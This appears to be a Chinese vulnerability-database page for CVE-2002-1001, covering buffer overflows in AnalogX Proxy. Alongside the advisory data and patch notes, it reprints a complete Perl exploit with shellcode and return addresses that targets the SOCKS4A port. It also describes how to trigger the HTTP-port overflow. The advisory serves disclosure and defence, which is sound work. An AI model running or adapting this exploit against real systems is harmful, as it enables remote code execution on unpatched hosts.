CVE-2002-1001
CVSS7.5
发布时间 :2002-10-04 00:00:00
修订时间 :2008-09-05 16:29:30
NMCOES    

[原文]Buffer overflows in AnalogX Proxy before 4.12 allows remote attackers to cause a denial of service and possibly execute arbitrary code via (1) a long HTTP request to TCP port 6588 or (2) a SOCKS 4A request to TCP port 1080 with a long DNS hostname.


[CNNVD]AnalogX Proxy Socks4A远程缓冲区溢出漏洞(CNNVD-200210-029)

        
        AnalogX Proxy是一款允许多台机器通过局域网上的一台机器共享访问Internet的代理程序。
        AnalogX Proxy在处理畸形Socks4a请求时存在问题,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。
        攻击者可以发送主机名段中包含140或者更多字节的Socks4a请求到AnalogX Proxy监听的TCP 1080端口,可导致AnalogX Proxy产生访问冲突应用错误。手工撤除错误信息框可终止进程,如果不手工撤除错误信息框,多次类似的请求可导致服务停止响应。
        精心提交主机段数据可能导致攻击者以AnalogX Proxy进程的权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:analogx:proxy:4.0.1AnalogX AnalogX Proxy 4.0.1
cpe:/a:analogx:proxy:4.0.3AnalogX AnalogX Proxy 4.0.3
cpe:/a:analogx:proxy:4.0.6AnalogX AnalogX Proxy 4.0.6
cpe:/a:analogx:proxy:4.0.4AnalogX AnalogX Proxy 4.0.4
cpe:/a:analogx:proxy:4.0.5AnalogX AnalogX Proxy 4.0.5
cpe:/a:analogx:proxy:4.0.2AnalogX AnalogX Proxy 4.0.2
cpe:/a:analogx:proxy:4.0AnalogX AnalogX Proxy 4.0
cpe:/a:analogx:proxy:4.0.7AnalogX AnalogX Proxy 4.0.7

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1001
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1001
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200210-029
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5139
(VENDOR_ADVISORY)  BID  5139
http://www.securityfocus.com/bid/5138
(VENDOR_ADVISORY)  BID  5138
http://www.iss.net/security_center/static/9456.php
(VENDOR_ADVISORY)  XF  analogx-proxy-socks4a-bo(9456)
http://www.iss.net/security_center/static/9455.php
(VENDOR_ADVISORY)  XF  analogx-proxy-http-bo(9455)
http://www.analogx.com/contents/download/network/proxy.htm
(UNKNOWN)  CONFIRM  http://www.analogx.com/contents/download/network/proxy.htm
http://archives.neohapsis.com/archives/bugtraq/2002-07/0006.html
(UNKNOWN)  BUGTRAQ  20020701 Foundstone Advisory - Buffer Overflow in AnalogX Proxy (fwd)

- 漏洞信息

AnalogX Proxy Socks4A远程缓冲区溢出漏洞
高危 边界条件错误
2002-10-04 00:00:00 2006-09-25 00:00:00
远程  
        
        AnalogX Proxy是一款允许多台机器通过局域网上的一台机器共享访问Internet的代理程序。
        AnalogX Proxy在处理畸形Socks4a请求时存在问题,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击。
        攻击者可以发送主机名段中包含140或者更多字节的Socks4a请求到AnalogX Proxy监听的TCP 1080端口,可导致AnalogX Proxy产生访问冲突应用错误。手工撤除错误信息框可终止进程,如果不手工撤除错误信息框,多次类似的请求可导致服务停止响应。
        精心提交主机段数据可能导致攻击者以AnalogX Proxy进程的权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        AnalogX
        -------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.analogx.com

- 漏洞信息 (21589)

AnalogX Proxy 4.0 Socks4A Buffer Overflow Vulnerability (EDBID:21589)
windows remote
2002-07-01 Verified
0 Kanatoko
N/A [点击下载]
source: http://www.securityfocus.com/bid/5138/info

AnalogX Proxy is prone to a buffer overflow condition when attempting to handle malformed SOCKS4A requests (via TCP port 1080). This may be exploited to create a denial of service condition or to potentially execute arbitrary instructions with the privileges of the AnalogX Proxy process. 

#!/usr/local/bin/perl

#-----------------------------------------------------------
# AnalogX Proxy Version 4.10 exploit for Japanese Windows 2000 Pro (SP2)
# written by Kanatoko <anvil@jumperz.net>
# http://www.jumperz.net/
# thanx to: hsj (http://hsj.shadowpenguin.org/)
#-----------------------------------------------------------
use Socket;

$connect_host = "socks.example.com";
$port = 1080;
$iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
$sock_addr = pack_sockaddr_in($port,$iaddr);
socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
connect(SOCKET,$sock_addr) || die "Connect Error\n";
select(SOCKET); $|=1; select(STDOUT);

        # egg written by UNYUN (http://www.shadowpenguin.org/)
        # 57bytes
$egg  = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";

$buf  = "\x04\x01\x00\x19\x00\x00\x00\x01";
$buf .= "A" x 32;
$buf .= $egg;
$buf .= "\x00";
$buf .= "A" x 144;

        # JMP ESP in user32.dll( Japanese Windows 2000 Pro SP2 ) : 0x77DF492B
        # If you use English Windows 2000, try 0x77E2492B
$buf .= "\x2B\x49\xdf\x77";

        # JMP +0x22
$buf .= "\xEB\x22";
$buf .= "\x00";

print SOCKET $buf;
		

- 漏洞信息

3661
AnalogX Proxy Long URL (320) Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- 漏洞描述

AnalogX Proxy contains a flaw that allows a local network user to execute arbitrary code on the proxy server. The flaw is due to the proxy not properly filtering long URI requests. By supplying a carefully crafted URI greater than 320 characters to the proxy on port 6588, it will overflow a buffer and allow the malicious user to execute arbitrary code.

- 时间线

2003-05-16 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 4.12 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

AnalogX Proxy Web Proxy Buffer Overflow Vulnerability
Boundary Condition Error 5139
Yes No
2002-07-01 12:00:00 2009-07-11 02:56:00
Discovery of this issue is credited to "Foundstone Labs" <labs@foundstone.com>.

- 受影响的程序版本

AnalogX Proxy 4.0 7
AnalogX Proxy 4.0 6
AnalogX Proxy 4.0 5
AnalogX Proxy 4.0 4
AnalogX Proxy 4.0 3
AnalogX Proxy 4.0 2
AnalogX Proxy 4.0 1
AnalogX Proxy 4.0

- 漏洞讨论

AnalogX Proxy is prone to a buffer overflow condition when attempting to handle malformed HTTP proxy requests (via TCP port 6588). This may be exploited to create a denial of service condition or to potentially execute arbitrary instructions with the privileges of the AnalogX Proxy process.

- 漏洞利用

The following was provided as an example of how to reproduce this issue:

Send a HTTP proxy request to the target system on TCP port 6588 consisting of a single space character followed by 320 or more non-space characters followed by 2 carriage-return linefeeds causes a read access violation in the application.

Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com &lt;mailto:vuldb@securityfocus.com&gt;.

- 解决方案

It has been reported that the vendor has acknowledged this issue and will be offering solutions on their website.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站